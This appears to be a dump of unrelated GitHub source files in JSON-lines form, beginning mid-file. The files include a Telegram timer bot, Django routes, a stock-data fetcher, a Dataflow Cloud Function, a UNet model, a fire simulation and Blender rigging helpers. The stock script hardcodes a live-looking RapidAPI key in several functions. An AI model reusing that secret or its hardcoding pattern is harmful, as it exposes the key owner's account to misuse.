chat_id = update.effective_message.chat_id\n if not context.args:\n await update.effective_message.reply_text(\"ERROR You need to provide a valid login\")\n return\n\n self.location.cursor.execute(\"SELECT id FROM users WHERE chat_id=?\", (chat_id,))\n id = self.location.cursor.fetchone()\n if not id or not id[0]:\n await update.effective_message.reply_text(\"ERROR You don't have a friends list\")\n for user in context.args:\n self.location.cursor.execute(\"SELECT login FROM friends WHERE owner_id=? AND login=?\", (id[0], user))\n rmuser = self.location.cursor.fetchone()\n if not rmuser:\n await update.effective_message.reply_text(\"ERROR You need to provide a valid login\")\n return\n self.location.cursor.executemany(\"DELETE FROM friends WHERE owner_id=? AND login=?\", [(id[0], user,)])\n conn.commit()\n await update.effective_message.reply_text(\"User deleted correctly\")\n\n\n async def alarm(self, context: ContextTypes.DEFAULT_TYPE) -> None:\n job = context.job\n log_out_minutes = self.log_out_time - (job.data / 60)\n self.timer[job.chat_id].alert = None\n await context.bot.send_message(job.chat_id, text=f\"Ey! You have {log_out_minutes} minutes untill I die\\nGive me bananas please\")\n\n\n async def timeout(self, context: ContextTypes.DEFAULT_TYPE) -> None:\n job = context.job\n self.timer[job.chat_id].dead = None\n await context.bot.send_message(job.chat_id, text=f\"Your monkey has died, be carefull next time\\n#monkeylifematters\")\n\n\n async def start(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n if not chat_id:\n return\n if chat_id in self.timer:\n await self.stop(update, context)\n self.timer[chat_id] = DataTimer()\n if context.args and context.args[0].isnumeric() and float(context.args[0]) > 0:\n self.timer[chat_id].timer = float(context.args[0])\n first_name = update.effective_user.first_name\n self.timer[chat_id].time_init = time.monotonic()\n timer_clock = self.timer[chat_id].time_init - self.timer[chat_id].time_init\n self.timer[chat_id].dead = context.job_queue.run_once(self.timeout, self.log_out_time, chat_id=chat_id, name=str(chat_id))\n self.timer[chat_id].alert = context.job_queue.run_once(self.alarm, self.timer[chat_id].timer, chat_id=chat_id, name=str(chat_id), data=self.timer[chat_id].timer)\n await update.message.reply_text(f'Hello {first_name}, you\\'ve started the script.\\nTimer: {timer_clock}')\n\n\n async def status(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n\n if not chat_id in self.timer:\n await update.message.reply_text('ERROR you dont have a monkey, please execute /start')\n elif self.timer[chat_id].time_init != 0:\n timer = time.monotonic() - self.timer[chat_id].time_init\n await update.message.reply_text(f'Timer: {timer}')\n\n async def stop(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n #if self.timer[chat_id].alert and self.timer[chat_id].dead:\n try:\n if self.timer[chat_id].alert:\n self.timer[chat_id].alert.schedule_removal()\n if self.timer[chat_id].dead:\n self.timer[chat_id].dead.schedule_removal()\n self.timer.pop(chat_id)\n except (IndexError, AttributeError, KeyError):\n await update.effective_message.reply_text(\"ERROR\\nSorry, you have nothing to stop\")\n\n async def stop_all(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n self.timer = {}\n await context.job_queue.stop()\n\n\n\n\n\n\n\nload_dotenv()\n\nbot = Bot()\nkey = getenv(\"BOT_TOKEN\")\n\n\napp = ApplicationBuilder().token(key).build()\n\n#\n#---------- HELP PANEL HANDLER ------------------\n#\napp.add_handler(CommandHandler([\"h\", \"help\"], bot.help_panel))\n#\n#---------- LOGIN HANDLERS ----------------------\n#\napp.add_handler(CommandHandler([\"start\", \"s\"], bot.start))\napp.add_handler(CommandHandler([\"timerstatus\", \"ts\"], bot.status))\napp.add_handler(CommandHandler([\"stop\", \"o\"], bot.stop))\napp.add_handler(CommandHandler(\"kill\", bot.stop_all))\n\n\n\n#\n#---------- WHERE ARE THE MONKEYS HANDLERS ------\n#\napp.add_handler(CommandHandler([\"addmonkey\", \"a\"], bot.add_monkey))\napp.add_handler(CommandHandler([\"deletemonkey\", \"d\"], bot.delete_monkey))\napp.add_handler(CommandHandler([\"wherearethemonkeys\", \"w\"], bot.wherearethemonkeys))\napp.add_handler(CommandHandler([\"list\", \"ls\"], bot.list_show))\n#app.add_error_handler()\n\napp.run_polling()\n\nconn.close()\n","repo_name":"iortego42/monkey-telegram-bot","sub_path":"monkeyneedsbanana.py","file_name":"monkeyneedsbanana.py","file_ext":"py","file_size_in_byte":9057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42344309823","text":"import pkgutil\nimport inspect\nimport importlib\n\nfrom core.scheduling import ScheduleEntry, OneShotEntry\nfrom core.analytics import InlineAnalytics\nfrom core.constants import PLUGINS_ROOT\n\nPLUGIN_CLASSES = (ScheduleEntry, OneShotEntry, InlineAnalytics)\n\n\ndef get_plugin_classes():\n classes = []\n\n for _, name, ispkg in pkgutil.walk_packages([PLUGINS_ROOT], prefix=\"plugins.\"):\n if not ispkg:\n module = importlib.import_module(name)\n for _, obj in inspect.getmembers(module, inspect.isclass):\n if issubclass(obj, PLUGIN_CLASSES) and obj.default_values is not None:\n classes.append(obj)\n\n return classes\n\n\ndef get_plugins():\n entries = {}\n\n for obj in get_plugin_classes():\n entry = obj.get_or_create(name=obj.default_values[\"name\"])\n if entry.new:\n entry.modify(**obj.default_values)\n\n for sched in ScheduleEntry.objects.all():\n entries[sched.name] = sched\n\n return entries\n","repo_name":"yeti-platform/yeti","sub_path":"core/yeti_plugins.py","file_name":"yeti_plugins.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":1485,"dataset":"github-code","pt":"21"} +{"seq_id":"12408962329","text":"from django.urls import path\nfrom .views import (TagsList, ProductDetail, LimitedList, \n PopularList, SalesList, CreateReview)\n\nurlpatterns = [\n path('api/product/<int:pk>/', ProductDetail.as_view(), name='product_detail'),\n path('api/product/<int:pk>/reviews/', CreateReview.as_view()),\n path('api/tags/', TagsList.as_view(), name='tags_list'),\n path('api/products/popular/', PopularList.as_view(), name='popular'),\n path('api/products/limited/', LimitedList.as_view(), name='limited'),\n path('api/sales/', SalesList.as_view(), name='sales'),\n]","repo_name":"GlebSmor/Django_Shop","sub_path":"megano/products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"17582036682","text":"import requests\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport json\nimport datetime\nimport plotly.offline as pyo\nimport plotly.graph_objects as go\nimport os\n\n\ndef GetCrypto():\n url = \"https://twelve-data1.p.rapidapi.com/cryptocurrencies\"\n querystring = {\"format\":\"json\"}\n headers = {\n \"X-RapidAPI-Key\": \"01859bbbdbmsh5ef4be697540182p16dee3jsnd363a79130f7\",\n \"X-RapidAPI-Host\": \"twelve-data1.p.rapidapi.com\"\n }\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n L = []\n try:\n cryptos = json.loads(response.text)[\"data\"]\n except:\n raise Exception(\"Requests/min Exceeded.\")\n\n for crypto in cryptos:\n L.append(crypto[\"symbol\"])\n return L\n\ndef GetStocks():\n url = \"https://twelve-data1.p.rapidapi.com/stocks\"\n\n querystring = {\"exchange\": 'NASDAQ', \"format\":\"json\"}\n\n headers = {\n \"X-RapidAPI-Key\": \"01859bbbdbmsh5ef4be697540182p16dee3jsnd363a79130f7\",\n \"X-RapidAPI-Host\": \"twelve-data1.p.rapidapi.com\"\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n try:\n data = json.loads(response.text)[\"data\"]\n except:\n raise Exception(\"Requests/min Exceeded.\")\n \n L = []\n for e in data:\n L.append(e[\"symbol\"])\n \n return list(dict.fromkeys(L)) # Removing Duplicates\n\ndef GetForex():\n url = \"https://twelve-data1.p.rapidapi.com/forex_pairs\"\n querystring = {\"format\":\"json\"}\n headers = {\n \"X-RapidAPI-Key\": \"01859bbbdbmsh5ef4be697540182p16dee3jsnd363a79130f7\",\n \"X-RapidAPI-Host\": \"twelve-data1.p.rapidapi.com\"\n }\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n L = []\n try:\n forex = json.loads(response.text)[\"data\"]\n except:\n raise Exception(\"Requests/min Exceeded.\")\n \n for stock in forex:\n L.append(stock[\"symbol\"])\n return list(dict.fromkeys(L)) # Removing Duplicates\n\n\ndef GetStockData(symbol, interval, size=2*365):\n url = \"https://twelve-data1.p.rapidapi.com/time_series\"\n\n querystring = {\"interval\":interval, \"symbol\":symbol, \"format\":\"json\", \"outputsize\":size}\n\n headers = {\n \"X-RapidAPI-Key\": \"01859bbbdbmsh5ef4be697540182p16dee3jsnd363a79130f7\",\n \"X-RapidAPI-Host\": \"twelve-data1.p.rapidapi.com\"\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n \n\n H, L, O, C, V, D = [], [], [], [], [], []\n try:\n data = json.loads(response.text)[\"values\"]\n except:\n raise Exception(\"GETSTOCKDATA: Not Found / Cooldown !\")\n\n \n # Setting Data\n for e in data:\n H.append(e[\"high\"])\n D.append(e[\"datetime\"])\n L.append(e[\"low\"])\n O.append(e[\"open\"])\n C.append(e[\"close\"])\n try:\n V.append(e[\"volume\"])\n except:\n V.append(0)\n \n # Defining Market Capitalization Value for Symbol\n #MC = GetMaretMarketCap(symbol)\n \n #Reversing Lists\n H.reverse()\n L.reverse()\n O.reverse()\n C.reverse()\n D.reverse()\n V.reverse()\n\n #Converting Data to float-Str\n H = np.array(H).astype(float)\n L = np.array(L).astype(float)\n O = np.array(O).astype(float)\n C = np.array(C).astype(float)\n V = np.array(V).astype(float)\n D = np.array(D).astype(str)\n \n return {\"High\": H, \"Open\": O, \"Close\": C, \"Low\": L, \"Volume\": V, \"Date\": D}\n\ndef LinePlot(symbol, D, C, *args):\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=D, y=C,\n line=dict(width=3)))\n for x in args:\n fig.add_trace(go.Scatter(x=D, y=x[0], name= x[1],\n line=dict(width=1, dash='dot')))\n\n fig.update_layout(xaxis_title=\"Days\", yaxis_title=\"Stock Values\", title=f\"{symbol.upper()} Predictions\")\n\n #Save Plot\n name = os.urandom(13).hex()\n fig.write_image(f'static/data/{name}.png', width=500, height=500, scale=5)\n \n return name\n \n\ndef CandleStick(symbol, H, O, C, L, V, D, *args):\n fig = go.Figure(data=[go.Candlestick(x=D,\n open=O,\n high=H,\n low=L,\n close=C)])\n fig.update_layout(xaxis_rangeslider_visible=False)\n \n for x in args:\n fig.add_trace(go.Scatter(x=D, y=x, name='Moving Average',\n line=dict(width=2)))\n\n fig.update_layout(xaxis_title=\"Time\", yaxis_title=\"Stock Values\", title=f\"{symbol.upper()} Time Series\")\n\n #Save Plot\n name = os.urandom(12).hex()\n fig.write_image(f'static/data/{name}.png', width=500, height=500, scale=5)\n \n return name\n\n\n\n","repo_name":"yassernamez03/Finance-Chatbot","sub_path":"stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43680384487","text":"'''\nCreated on 2020.06.03\n\n@author: dd\n'''\nfrom pymatgen.analysis.phase_diagram import PhaseDiagram, PDPlotter\nfrom myResearch.getOrigStableEntriesList import getOrigStableEntriesList\nfrom pymatgen.core.periodic_table import Element\nfrom pymatgen.core.composition import Composition\nimport matplotlib.pyplot as plt\nfrom chemicalDiagram.ChemicalPotentialDiagram import ChemPotDiagram,ChemPotPlotter,trans_PD_to_ChemPot_entries\nels = [\"O\",\"Mn\"]\nelsE = [Element(i) for i in els]\nentries = getOrigStableEntriesList(els)\nentries = sorted(entries,key = lambda entry: entry.composition.get_atomic_fraction(els[1]))\nfor e in entries:\n print(e.name)\npd = PhaseDiagram(entries,elsE)\nD = {}\nfor e in entries:\n D[e] = pd.get_form_energy_per_atom(e)\nax = plt.gca()\nxx = []\nyy = []\nname = []\nfor e in entries:\n formE = D[e]\n ind = entries.index(e)\n if ind != len(entries)-1:\n formEnext = D[entries[ind+1]]\n slope = (formEnext-formE)/(entries[ind+1].composition.get_atomic_fraction(els[1])-e.composition.get_atomic_fraction(els[1]))\n intercept = D[e]-slope*e.composition.get_atomic_fraction(els[1])\n name.append(e.name)\n xx.append(intercept)\n yy.append(intercept+slope)\n ax.text(intercept, intercept+slope,e.name)\nax.plot(xx, yy)\n\nax.set_xlim([-10,0])\nax.set_ylim([-10,0])\nplt.xlabel(\"mu\"+els[0])\nplt.ylabel(\"mu\"+els[1])\nplt.show()\n# PDPlotter(pd).show()","repo_name":"dd-debug/examples_chemical_potential_diagrams","sub_path":"interceptPD3.py","file_name":"interceptPD3.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6384769193","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\n\ndf = pd.read_excel(r'C:\\Users\\pandy\\Documents\\UGM\\Akademik\\Semester 3\\MII2201 Analisis Algoritma dan Kompleksitas\\6\\Tugas\\sort.xlsx')\nprint(df)\n\n\n# In[2]:\n\n\nimport matplotlib.pyplot as plt\n\nx = df['n']\nyS = df['avgS']\nyH = df['avgH']\nyR = df['avgR']\nfig, ax = plt.subplots()\nax.plot(x, yS, '-o', label = 'selection sort')\nax.plot(x, yH, '-o', label = 'heap sort')\nax.plot(x, yR, '-o', label = 'radix sort')\nplt.xlabel('number of data (n)')\nplt.ylabel('average running time (seconds)')\nplt.title('Sorting time complexity')\nplt.xticks(rotation = 45)\nplt.grid(linestyle = 'dotted')\nplt.legend()\nplt.savefig('sortCombined.png', dpi = 300, bbox_inches = 'tight')\n\nfor i, txt in enumerate(yS):\n ax.annotate(txt, (x[i], yS[i]))\n\nfor i, txt in enumerate(yH):\n ax.annotate(txt, (x[i], yH[i]))\n \nfor i, txt in enumerate(yR):\n ax.annotate(txt, (x[i], yR[i]))\n\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"pandya-ae/algorithm-complexity-analysis","sub_path":"Sort/sortCombined.py","file_name":"sortCombined.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20553682455","text":"#!/usr/bin/python3\n\n\"\"\"\n\nAuthor: Tyler Santos\nDate: 8/1/2023\n\n\"\"\"\n\nimport os\nimport subprocess\nimport tarfile\nfrom datetime import date\n\ncurrent_date = str(date.today())\nhostname = subprocess.getoutput(\"hostname -s\")\nbackup_destination = '/home/tyler/backups/'\n\n\nsource_folders = [\n '/home/tyler/test1/',\n '/home/tyler/test2/'\n]\n\noutput = [\n backup_destination + 'test1' + '-' + hostname + current_date + '.tar.gz',\n backup_destination + 'test2' + '-' + hostname + current_date + '.tar.gz'\n]\n\n###\n# Backup files\n###\nfor index, folder in enumerate(source_folders):\n tar_archive = tarfile.open(output[index], mode='w:gz')\n\n for root, dirs, files in os.walk(folder):\n for file in files:\n tar_archive.add(os.path.join(root, file))\n\n tar_archive.close()\n\n\n###\n# Delete the 2 oldest files\n###\nos.chdir(backup_destination)\nfiles = sorted(os.listdir(backup_destination), key=os.path.getctime)\n\nos.remove(files[0])\nos.remove(files[1])\n\nprint(\"Deleted \" + files[0] + \" and \" + files[1])\n","repo_name":"santost12/uf-abe-scripts","sub_path":"python/nfs-backups-v1.py","file_name":"nfs-backups-v1.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7905875344","text":"#Cloud Function to run Data Flow Pipeline on new file upload in Google Storage functions-df-gcs-bq-load-job\n\n#############main.py##################\ndef startDataflowProcess(data, context):\n\tfrom googleapiclient.discovery import build\n\t#replace with your projectID\n\tproject = \"third-campus-303308\"\n\tjob = project + \" \" + str(data['timeCreated'])\n\t#path of the dataflow template on google storage bucket\n\ttemplate = \"gs://third-campus-303308-df-bucket/sample-template/template_data_ingestion_df\"\n\tinputFile = \"gs://\" + str(data['bucket']) + \"/\" + str(data['name'])\n\tbq_table_name = \"ds_bigmart.big_mart_cf\"\n\t#user defined parameters to pass to the dataflow pipeline job\n\tparameters = {\n\t\t'inputFile': inputFile, 'bq_table': bq_table_name\n\t}\n\t#tempLocation is the path on GCS to store temp files generated during the dataflow job\n\tenvironment = {'tempLocation': 'gs://third-campus-303308-df-bucket/temp-location'}\n\n\tservice = build('dataflow', 'v1b3', cache_discovery=False)\n\t#below API is used when we want to pass the location of the dataflow job\n\trequest = service.projects().locations().templates().launch(\n\t\tprojectId=project,\n\t\tgcsPath=template,\n\t\tlocation='europe-west2',\n\t\tbody={\n\t\t\t'jobName': job,\n\t\t\t'parameters': parameters,\n\t\t\t'environment':environment\n\t\t},\n\t)\n\tresponse = request.execute()\n\tprint(str(response))\n\n","repo_name":"trushasahu/Fun-to-invoke-DF-to-load-CSV-to-BQ","sub_path":"function/Fun_to_invok_DF_to_load_CS_CSV_to_BQ_tbl.py","file_name":"Fun_to_invok_DF_to_load_CS_CSV_to_BQ_tbl.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"43383723128","text":"from typing import Any\nimport torch\nfrom torch import nn\n\n\nclass ConvBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_out: int\n ) -> None:\n super().__init__()\n self.conv = nn.Conv2d(\n channels_in,\n channels_out,\n 3,\n padding = 'same',\n padding_mode = 'reflect'\n )\n self.act = nn.LeakyReLU(0.1)\n self.skip = channels_in == channels_out\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n if self.skip:\n x_0 = x\n x = self.conv(x)\n x = self.act(x)\n if self.skip:\n x = x + x_0\n return x\n\n\nclass InBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_out: int\n ) -> None:\n super().__init__()\n self.conv = ConvBlock(channels_in, channels_out)\n self.down = DownBlock(channels_out, channels_out)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.conv(x)\n x = self.down(x)\n return x\n\n\nclass OutBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_mid: int,\n channels_out: int\n ) -> None:\n super().__init__()\n self.conv1 = ConvBlock(channels_in, channels_mid)\n self.conv2 = ConvBlock(channels_mid, channels_mid // 2)\n self.conv_out = nn.Conv2d(\n channels_mid // 2,\n channels_out,\n 3,\n padding = 'same',\n padding_mode = 'reflect'\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv_out(x)\n return x\n\n\nclass DownBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_out: int,\n ) -> None:\n super().__init__()\n self.conv = ConvBlock(channels_in, channels_out)\n self.pool = nn.Conv2d(\n channels_out,\n channels_out,\n 3,\n stride = 2,\n padding = 1,\n padding_mode = 'reflect'\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.conv(x)\n x = self.pool(x)\n return x\n\n\nclass UpBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_out: int\n ) -> None:\n super().__init__()\n self.conv1 = ConvBlock(channels_in, channels_out)\n self.conv2 = ConvBlock(channels_out, channels_out)\n self.up = nn.ConvTranspose2d(\n channels_out,\n channels_out,\n 3,\n stride = 2,\n padding = 1,\n output_padding = 1\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.up(x)\n return x\n\n\nclass MidBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_out: int\n ) -> None:\n super().__init__()\n self.down = DownBlock(channels_in, channels_out)\n self.conv = ConvBlock(channels_out, channels_out)\n self.up = nn.ConvTranspose2d(\n channels_out,\n channels_out,\n 3,\n stride = 2,\n padding = 1,\n output_padding = 1\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.down(x)\n x = self.conv(x)\n x = self.up(x)\n return x\n\n\nclass UNetV2(nn.Module):\n def __init__(self,\n channels_in: int = 3,\n channels_out: int = 3,\n blocks: int = 6,\n stepping: tuple[int, int] = (48, 96, 64)\n ) -> None:\n super().__init__()\n self.ksize: int = 2 ** blocks\n self.down_blocks: nn.ModuleList[DownBlock] = nn.ModuleList((\n InBlock(channels_in, stepping[0]),\n *( DownBlock(stepping[0], stepping[0]) for _ in range(blocks - 2) )\n ))\n self.mid_block = MidBlock(stepping[0], stepping[0])\n self.up_blocks: nn.ModuleList[UpBlock] = nn.ModuleList((\n *(\n UpBlock(stepping[0] + stepping[1] if i > 0 else stepping[1], stepping[1])\n for i in range(blocks - 1)\n ),\n OutBlock(stepping[1] + channels_in, stepping[2], channels_out)\n ))\n self.hparams: dict[str, Any] = {\n 'blocks': blocks,\n 'fixed_step': True,\n 'stepping': stepping,\n 'net': self.__class__.__name__\n }\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n pools: list[torch.Tensor] = [ x ]\n for l in self.down_blocks:\n x = l(x)\n pools.append(x)\n x = self.mid_block(x)\n for l in self.up_blocks:\n x = torch.cat([ x, pools.pop() ], dim = 1)\n x = l(x)\n return x\n\n","repo_name":"lopho/im2im","sub_path":"unet_v2.py","file_name":"unet_v2.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"11489568830","text":"# Uses python3\nimport sys\n\ndef get_change(m):\n coins = m // 10\n remain = m % 10\n coins += remain // 5\n coins += remain % 5\n return coins\n\nif __name__ == '__main__':\n m = int(input())\n print(get_change(m))\n","repo_name":"supracharger/Data-Structures-Algorithms","sub_path":"Algorithmic_Toolbox/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16791529072","text":"# extended fire model from pcraster workshop, based on work by http://karssenberg.geo.uu.nl/labs/index.html\nfrom pcraster import *\nfrom pcraster.framework import *\n\nclass Fire(DynamicModel):\n def __init__(self):\n DynamicModel.__init__(self)\n setclone('clone.map')\n\n def initial(self):\n start = readmap(\"start\")\n start = nominal(start)\n\n inputMap = uniform(1)\n\n # start the fire at random location (doesn't matter if empty or not)\n # fireStarter = ifthenelse(inputMap == mapmaximum(inputMap), boolean(1), boolean(0))\n \n # 0 empty, 1 fire, 5, 6 ... tree species\n # distribution of empty and tree cells\n # self.all = ifthenelse(inputMap < 0, nominal(0), nominal(5)) # empty or species 5\n # self.all = ifthenelse(inputMap > 0.5, nominal(6), self.all) # species 6 or as defined above\n # self.all = ifthenelse(fireStarter, nominal(1), self.all) # set fire\n\n # use original starter map instead for continuous fire starting point\n self.all = ifthenelse(pcrnot(boolean(start)), nominal(5), start)\n self.all = ifthenelse(pcrand(self.all == 5, inputMap < 0.5), nominal(6), self.all)\n \n self.report(self.all, \"input\")\n\n # fire = self.all == 1\n # self.report(fire, \"fire\")\n\n\n\n def dynamic(self):\n # currently burning\n fire = self.all == 1\n self.report(fire, \"fire\")\n # burn\n self.all = ifthenelse(self.all == 1, nominal(0), self.all)\n\n # distance to fire\n if (maptotal(scalar(fire)) > 0):\n print(\"fire\")\n distanceToFire = spread(fire, 0, 1)\n self.report(distanceToFire, \"dist\")\n\n randomMap = uniform(1)\n\n # new fire, based on distance\n n1 = ifthenelse(pcrand(randomMap < 0.9, distanceToFire < 11), boolean(1), boolean(0))\n n2 = ifthenelse(pcrand(randomMap < 0.4, distanceToFire < 25), boolean(1), boolean(0))\n n3 = ifthenelse(pcrand(randomMap < 0.1, distanceToFire < 55), boolean(1), boolean(0))\n\n newFireDist = pcror(n1, pcror(n2, n3))\n # newFireDist = n1\n self.report(newFireDist, \"nFD\")\n\n # or, model depending on quadratic spread\n # distanceToFire = spread(fire, 0, 1.1) * spread(fire, 0, 1.1)\n # distanceToFire = 1 / distanceToFire\n # newFireDist = ifthenelse(randomMap < distanceToFire, boolean(1), boolean(0))\n # self.report(newFireDist, \"dist\")\n\n # new fire, based on trees\n species5 = self.all == 5\n species6 = self.all == 6\n\n # draw again\n randomMap = uniform(1)\n\n s1 = ifthenelse(pcrand(randomMap < 0.8, species5), boolean(1), boolean(0))\n s2 = ifthenelse(pcrand(randomMap < 0.7, species6), boolean(1), boolean(0))\n\n newFireSpecies = pcror(s1, s2)\n self.report(newFireSpecies, \"nFS\")\n\n # bring together both distributions\n newFire = pcrand(newFireDist, newFireSpecies)\n self.report(newFire, \"nF\")\n\n # empty cells can not burn\n newFireNotEmpty = pcrand(scalar(self.all) > 0, newFire)\n self.report(newFireNotEmpty, \"nFnE\")\n\n # change in self.all: if newFire, set as 1, others stay the same\n self.all = ifthenelse(newFireNotEmpty, nominal(1), self.all)\n else:\n # self.all should remain constant\n print(\"no fire\")\n self.report(self.all, \"all\")\n area = areaarea(self.all)\n self.report(area, \"area\")\n\nnrOfTimeSteps=30\nmyModel = Fire()\ndynamicModel = DynamicFramework(myModel,nrOfTimeSteps)\ndynamicModel.run()\n\n","repo_name":"jonathom/extendedFireModel","sub_path":"fire_ext.py","file_name":"fire_ext.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72295239413","text":"import random\n\n\nfrom core.models import PersonaModel\n\nfrom django.db import models\n\n\nclass Teacher(PersonaModel):\n FIELD_OF_STUDY_CHOICES = [\n ('Programming', (\n ('front-end', 'Front-End'),\n ('java', 'Java'),\n ('php', 'PHP'),\n ('python', 'Python'),\n ('devops', 'Devops'),\n ('machine-learning', 'Machine Learning'),\n ('c-sharp', 'C#'),\n )),\n ('Quality Assurance', (\n ('qa-manual', 'QA Manual'),\n ('qa-automation-java', 'QA Automation Java'),\n ('qa-automation-java', 'QA Automation Python'),\n )),\n ('Management', (\n ('project-management', 'Project Management'),\n ('product-management', 'Product Management'),\n ('hr', 'Recruitment & HR'),\n ('business-analyst', 'Business Analyst'),\n )),\n ('Marketing', (\n ('internet-marketing', 'Internet Marketing'),\n ('smm', 'Social Media Marketing'),\n ('smm-pro', 'SMM Pro'),\n ('inter-mark-for-business', 'Internet Marketing for Business'),\n )),\n ('Design', (\n ('ux-ui', 'UX/UI Design'),\n )),\n ('Children Education', (\n ('front-end-kids', 'Front-end(Kids)'),\n ('python-kids', 'Python(Kids)'),\n ('design-kids', 'Design(Kids)'),\n ('java-kids', 'Java(Kids)'),\n )),\n ]\n salary = models.PositiveIntegerField(default=10_000)\n specialization = models.CharField(\n db_column='specialization',\n max_length=25,\n choices=FIELD_OF_STUDY_CHOICES,\n )\n\n def __str__(self):\n return f'{self.first_name} {self.last_name} ({self.specialization.title()}) (${self.salary})'\n\n class Meta:\n db_table = 'lms_teachers'\n\n @classmethod\n def _generate(cls):\n obj = super()._generate()\n spec = random.choice(\n [specialization for _, specializations in cls.FIELD_OF_STUDY_CHOICES\n for specialization in specializations]\n )\n obj.specialization = spec[0]\n obj.salary = random.randint(10_000, 100_000)\n obj.save()\n","repo_name":"HansLanda96/DjangoOpenning","sub_path":"teachers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3036093020","text":"import bpy\nimport os\nimport pathlib\nimport numpy\n\nimport mathutils\nimport platform\nimport subprocess\n\nimport math\n\nscript_file = os.path.realpath(__file__)\naddon_directory = os.path.dirname(script_file)\naddon_name = os.path.basename(addon_directory)\n\nSEPARATOR_List = [\".\", \"_\", \"-\"]\nSide_List = {\"l\": \"r\", \"L\":\"R\", \"left\": \"right\", \"Left\":\"Right\", \"LEFT\": \"RIGHT\"}\n\nFRONT_Side_Separator_List = {}\nBACK_Side_Separator_List = {}\n\nfor key, value in Side_List.items():\n\n for separator in SEPARATOR_List:\n FRONT_Side_Separator_List[key+separator] = value+separator\n BACK_Side_Separator_List[separator+key] = separator+value\n\n\n\n\n\ndef Parent_Counter(self, Bone):\n\n Checker = Bone.parent\n if Checker:\n self.Counter += 1\n Parent_Counter(self, Checker)\n\n\n\ndef Find_Chain_Root(Chain_Length, Bone):\n\n bone_chain = []\n\n bone_chain.append(Bone)\n\n parent_finder = Bone.parent\n\n if parent_finder:\n bone_chain.append(parent_finder)\n Loop_Amount = Chain_Length-2\n\n if Loop_Amount > 0:\n for count in range(Loop_Amount):\n if parent_finder:\n parent_finder = parent_finder.parent\n if parent_finder:\n bone_chain.append(parent_finder)\n else:\n bone_chain.append(None)\n\n return bone_chain\n\n\n\ndef Align_Bone_Roll(object, bone, target):\n\n\n bone = object.data.edit_bones.get(bone.name)\n\n bpy.ops.armature.select_all(action='DESELECT')\n\n cursor_location = bpy.context.scene.cursor.location.copy()\n\n bpy.context.scene.cursor.location = object.matrix_world @ target\n\n bone.select = True\n bpy.ops.armature.calculate_roll(type='CURSOR')\n bone.roll -= math.radians(90)\n\n bpy.context.scene.cursor.location = cursor_location\n\n bpy.ops.armature.select_all(action='DESELECT')\n\n\ndef Align_Bones_Roll(object, bones, target):\n\n bone_selection = [select_bone for select_bone in object.data.edit_bones if select_bone.select]\n\n for bone in bones:\n Align_Bone_Roll(object, bone, target)\n bpy.ops.armature.select_all(action='DESELECT')\n\n for select_bone in bone_selection:\n select_bone.select = True\n\ndef Get_Pole_Angle(object, bone, target):\n\n original_roll = bone.roll\n\n Align_Bone_Roll(object, bone, target)\n bpy.ops.armature.select_all(action='DESELECT')\n\n adjusted_roll = bone.roll\n\n bone.roll = original_roll\n\n pole_angle = original_roll - adjusted_roll\n\n if pole_angle > math.radians(180):\n pole_angle = 